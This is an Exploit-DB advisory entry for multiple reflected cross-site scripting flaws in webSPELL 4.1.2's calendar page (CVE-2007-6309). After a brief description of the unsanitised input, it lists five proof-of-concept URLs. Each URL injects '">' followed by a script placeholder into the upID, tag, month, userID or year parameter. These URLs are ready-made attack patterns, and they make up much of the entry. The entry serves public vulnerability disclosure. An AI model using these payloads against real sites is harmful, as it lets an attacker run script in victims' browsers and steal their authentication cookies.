webSPELL 4.1.2 calendar.php Multiple Parameter XSS

2007-12-10T00:00:00
ID EDB-ID:30858
Type exploitdb
Reporter Brainhead
Modified 2007-12-10T00:00:00

Description

webSPELL 4.1.2 calendar.php Multiple Parameter XSS. CVE-2007-6309 . Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/26787/info
 
webSPELL is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
 
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
 
webSPELL 4.01.02 is affected; other versions may also be vulnerable. 

http://www.example.com/[PATH]/index.php?site=calendar&action=announce&upID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&tag=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&month=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&userID=">[your code]
http://www.example.com/[PATH]/index.php?site=calendar&action=announce&year=">[your code]